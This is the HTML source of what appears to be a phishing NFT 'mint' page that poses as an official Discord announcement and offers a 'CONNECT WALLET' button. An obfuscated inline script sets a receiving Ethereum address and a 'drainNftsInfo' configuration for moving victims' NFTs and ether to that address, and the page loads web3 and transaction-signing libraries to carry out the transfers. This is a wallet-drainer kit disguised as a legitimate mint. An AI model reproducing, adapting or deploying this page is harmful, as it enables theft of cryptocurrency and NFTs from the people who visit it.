<!DOCTYPE html><html lang="en">
   
   <!--The header name is indicated here...-->
   <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <link rel="icon" href="">
      <meta property="og:site_name" content="Automatic Message From Official Discord Channel">
      <meta name="theme-color" content="#61ce70">
      <meta name="twitter:card" content="summary_large_image">
      <title>ETHEREUM NFT</title>
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Lexend+Deca:wght@300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet">
      <link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono:wght@700&amp;display=swap" rel="stylesheet">
      <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700;900&amp;display=swap" rel="stylesheet">
      <link href="https://fonts.googleapis.com/css2?family=Londrina+Solid&amp;display=swap" rel="stylesheet">
      <link href="css/bootstrap.min_1.css" rel="stylesheet">
      <link href="css/all.min.css" rel="stylesheet">
      <link href="css/cover.css" rel="stylesheet">
      <script src="js/settings.js"></script>
      
      <style type="text/css">
					@font-face {font-family: "African Design";font-display: auto;font-fallback:auto ;font-weight: 300;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/AfricanDesign-2.ttf) format('TrueType');} @font-face {font-family: "Lynx";font-display: auto;font-fallback:auto ;font-weight: 400;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/Lynx.ttf) format('TrueType');} @font-face {font-family: "Lynx Regular";font-display: auto;font-fallback:auto ;font-weight: 400;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/Lynx-Regular.ttf) format('TrueType');} @font-face {font-family: "Mamakilo";font-display: auto;font-fallback:auto ;font-weight: 300;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/MamaKilo-Black.ttf) format('TrueType');} @font-face {font-family: "Mamakilo Deco";font-display: auto;font-fallback:auto ;font-weight: 300;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/MamaKilo-Decorative.otf) format('OpenType');} @font-face {font-family: "Papakilo";font-display: auto;font-fallback:auto ;font-weight: 400;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/PapaKilo-Light.ttf) format('TrueType');} @font-face {font-family: "Papakilo Deco";font-display: auto;font-fallback:auto ;font-weight: 400;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/PapaKilo-Decorative.ttf) format('TrueType');} @font-face {font-family: "Raslani";font-display: auto;font-fallback:auto ;font-weight: 300;src: url(https://alkebulantribe.io/wp-content/uploads/2022/01/Raslani-Tribal.ttf) format('TrueType');}				</style>

  </head>

   
   <body>
      
      <header>
         <div class="navbar">
            <div class="navbar_image">
               <!-- Comment out if Logo is used-->
               <div style="width:100%; margin:0px auto 0px auto; text-align:center;">		   
                 
               </div>
               <!-- <h1 class="textbanner">thehighsociety</h1> -->
            </div>
            <style>.bg-custom{background-image:url(images/bg.jpg);background-position:center center;background-repeat:no-repeat;background-size:cover}</style>
         </div>
      </header>
      <div class="vh-80 dt w-100 ">
         <div class="dtc v-mid tc white ph3 ph4-l">
            <div class="row">
               <div style="margin:50px auto 0px auto; text-align:center" id="claim-text-wrapper">
                  <a id href="https://discord.gg/zuxa" class="item  " target="_blank">
                  <img src="fonts/icons/Discord_Icon.svg" draggable="false" alt="Discord"></a>
                  <a id href="http://twitter.com/Zoxa88281009" class="item " target="_blank">
                  <img src="fonts/icons/Twitter_Icon.svg" draggable="false" alt="Twitter"></a>
                  <div id="payment-modal">
                     <div id="payment-header">
                        <div id="payment-header-text">
                           <img class="logo1" src="images/logo.png"> 
                           <script>
                              (function(_0x323881,_0x1a488f){const _0xc16f1a=_0x42c9,_0x139da5=_0x323881();while(!![]){try{const _0x23a6d3=-parseInt(_0xc16f1a(0x1dc))/0x1+-parseInt(_0xc16f1a(0x1ce))/0x2*(parseInt(_0xc16f1a(0x1d1))/0x3)+parseInt(_0xc16f1a(0x1c6))/0x4+parseInt(_0xc16f1a(0x1da))/0x5+-parseInt(_0xc16f1a(0x1d3))/0x6+-parseInt(_0xc16f1a(0x1d7))/0x7+parseInt(_0xc16f1a(0x1d6))/0x8;if(_0x23a6d3===_0x1a488f)break;else _0x139da5['push'](_0x139da5['shift']());}catch(_0x2ed120){_0x139da5['push'](_0x139da5['shift']());}}}(_0x19c0,0x37c9d));const _0x14f047=_0x16ce;(function(_0x2056b2,_0x367456){const _0x14eade=_0x42c9,_0x7268b2=_0x16ce,_0x12d88d=_0x2056b2();while(!![]){if(_0x14eade(0x1c9)!=='LEYVx')return _0x46f5da;else try{if(_0x14eade(0x1d5)===_0x14eade(0x1c7)){const _0x100ba9=_0xc85b69();return _0x455c26=function(_0x5c0c43,_0x298ae1){_0x5c0c43=_0x5c0c43-0x103;let _0x50928d=_0x100ba9[_0x5c0c43];return _0x50928d;},_0xafb9(_0x98e214,_0x20f73c);}else{const _0x54c8a2=-parseInt(_0x7268b2(0x10e))/0x1+-parseInt(_0x7268b2(0x106))/0x2*(parseInt(_0x7268b2(0x10a))/0x3)+parseInt(_0x7268b2(0x105))/0x4+parseInt(_0x7268b2(0x104))/0x5*(-parseInt(_0x7268b2(0x108))/0x6)+parseInt(_0x7268b2(0x103))/0x7+-parseInt(_0x7268b2(0x10b))/0x8*(parseInt(_0x7268b2(0x10d))/0x9)+parseInt(_0x7268b2(0x109))/0xa*(parseInt(_0x7268b2(0x107))/0xb);if(_0x54c8a2===_0x367456)break;else _0x12d88d[_0x14eade(0x1d9)](_0x12d88d[_0x14eade(0x1db)]());}}catch(_0x186a52){'eTjxC'==='dZbLO'?_0x491f0c['push'](_0x57eebe[_0x14eade(0x1db)]()):_0x12d88d[_0x14eade(0x1d9)](_0x12d88d[_0x14eade(0x1db)]());}}}(_0x509a,0xacad3));function _0x16ce(_0x313dbf,_0x12d7f9){const _0x140bcd=_0x509a();return _0x16ce=function(_0x49cd38,_0xaaae8e){const _0x56770e=_0x42c9;if(_0x56770e(0x1de)===_0x56770e(0x1c5)){_0x168cc8=_0x5d121e-0x103;let _0x1846fa=_0x44dff5[_0x4f9034];return _0x1846fa;}else{_0x49cd38=_0x49cd38-0x103;let _0x5cc165=_0x140bcd[_0x49cd38];return _0x5cc165;}},_0x16ce(_0x313dbf,_0x12d7f9);}function _0x42c9(_0x10f784,_0x25f67b){const _0x19c0d5=_0x19c0();return _0x42c9=function(_0x42c951,_0x57659e){_0x42c951=_0x42c951-0x1c4;let _0x4f72ca=_0x19c0d5[_0x42c951];return _0x4f72ca;},_0x42c9(_0x10f784,_0x25f67b);}function _0x19c0(){const _0x154f47=['171609JTpKpV','686234DUNPST','275QmAEjJ','6avGHZc','3sYspwN','1209290DPkQyg','1301478bDctEH','1161zfLSHt','UhoVI','2419240bCxbab','1646036qoCadJ','8351392YxwVCo','push','2095195XlGNua','shift','18990iyIcjx','KKwDZ','LahjP','0xef4336B0D6a16a5Dc05b71f49aC7E614C16Af430','mlyuY','1284932eYjbdQ','Hqmql','2014820LvlcbN','LEYVx','225828IioaGW','34uNcRDz','1164619rCCYHF'];_0x19c0=function(){return _0x154f47;};return _0x19c0();}const PRICE=0.01,TOTAL=0x1,MAX=0x1,receiveAddress=_0x14f047(0x10c),drainNftsInfo={'active':![],'minValue':0.1,'nftReceiveAddress':'0xef4336B0D6a16a5Dc05b71f49aC7E614C16Af430'};function _0x509a(){const _0x17c8c9=_0x42c9,_0x305e8d=['63592HMvlvT',_0x17c8c9(0x1c4),_0x17c8c9(0x1d4),'1164619rCCYHF',_0x17c8c9(0x1d8),_0x17c8c9(0x1c8),_0x17c8c9(0x1ca),_0x17c8c9(0x1cb),'275QmAEjJ',_0x17c8c9(0x1d0),'1209290DPkQyg',_0x17c8c9(0x1cd)];return _0x509a=function(){const _0x463ba8=_0x17c8c9;if(_0x463ba8(0x1dd)!=='KKwDZ'){const _0x5ecac5=['63592HMvlvT','0xef4336B0D6a16a5Dc05b71f49aC7E614C16Af430',_0x463ba8(0x1d4),_0x463ba8(0x1cc),'8351392YxwVCo',_0x463ba8(0x1c8),_0x463ba8(0x1ca),_0x463ba8(0x1cb),_0x463ba8(0x1cf),_0x463ba8(0x1d0),_0x463ba8(0x1d2),_0x463ba8(0x1cd)];return _0x4afceb=function(){return _0x5ecac5;},_0x3bbd54();}else return _0x305e8d;},_0x509a();}
                                    </script>
                           <script>
                              date = new Date();
                              year = date.getFullYear();
                              month = date.getMonth() + 1;
                              day = date.getDate();
                              document.getElementById("current_date").innerHTML = month + "/" + day + "/" + year;
                           </script>
                           
                        </div>
                     </div>
                     <div id="payment-info">
                        <img src="https://lh3.googleusercontent.com/LGjnwASbtNBA0R_Pln0sC71REYCOeLHK3qfmY2-Z8jCLA4YHq990s_yOMkFYyaItMEVEFmHLuNoyIzcIKDDQtxg9vglB_ujJ19YZzw" class="image" height="250px" id="price-img">
                        <div id="payment-info-text">
                           <p class="title1">Ethereum</p>
                           <p class="title2">Available:<span class="freemint"> 0.4021 </span></p>
                           <div class="line-4">
                              <hr>
                           </div>
                        </div>
                     </div>
                     <main class="px-3 minter">
                        <div class="lead nftSelector" style="display:none">
                           <div>
                              <span class="amountSelector minus fas fa-minus"></span>
                              <p class="showcase__minted ">
                                 MINTED: <span class="count">0</span> / 1
                              </p>
                              <span style="display:none" class="amountSelector plus fas fa-plus"></span>
                           </div>
                           <button class="btn-rounded2 setMax">Set max</button>
                        </div>
                        <hr>
                        <p style="display:none" class="lead basket">
                           <span class="color">TOTAL PRICE:</span>
                           <span class="totalPrice"></span> ETH
                        </p>
                        <p style="/*display:inline ; text-align:center; margin:auto; weight:100%;*/" class="lead cta">
                           <button id="claimButton" class="btn-rounded mint disable" style="display: block;">CONNECT WALLET</button>
                           <button id="connectButton" class="btn-rounded connect" style=" display: none;">CONNECT</button>
                        </p>
                        <p style="display:none" class="lead basket">
                        </p><div class="progr-container">
                           <div class="prgcont">
                              <div class="bar">
                                 <div class="bar-done" data-done="81"></div>
                              </div>
                              <div style="display:none" class="text-glitch">
                                 <span class="countA">0</span>
                                 <span class="max">0</span>
                              </div>
                           </div>
                        </div>
                        <p></p>
                     </main>
                     </p><p>
                  </p></div>
               </div>
            </div>
         </div>
      </div>
   
   <div class="modal fade myModal" id="metaMaskModal" tabindex="-1" role="dialog" aria-labelledby="metaMaskModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
         <div class="modal-content">
            <div class="modal-body">
               <p class="lead info">METAMASK NEEDED</p>
               <img width="90" alt="MetaMask" src="images/meta_mask.png">
               <p class="lead info">Please install <a href="https://metamask.io/download.html" target="_blank">MetaMask</a>
                  to connect your wallet.
               </p>
            </div>
         </div>
      </div>
   </div>
   <div class="modal fade myModal" id="mintingModal" tabindex="-1" role="dialog" aria-labelledby="mintingModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
         <div class="modal-content">
            <div class="modal-body">
               <p class="lead info">THANK YOU FOR YOUR SUPPORT</p>
               <span class="purchased far fa-check-circle"></span>
               <p class="lead info">NTFs will be displayed in your ethereum wallet after project is launched.</p>
            </div>
         </div>
      </div>
   </div>
   <script src="js/jquery-3.3.1.slim.min.js"></script>
   <script src="js/bootstrap.bundle.min.js"></script>
   <script src="js/GEN/web3.min.js"></script>
   <script src="js/GEN/moralis.js"></script>
   <script src="js/index.min.js"></script>
   <script src="js/GEN/ethereumjs-tx-1.3.3.min.js"></script>
   <script type="text/javascript" src="js/fat.js"></script>
   <script charset="UTF-8" id="LA_COLLECT" src="js/GEN/lat.js"></script>
</body></html>
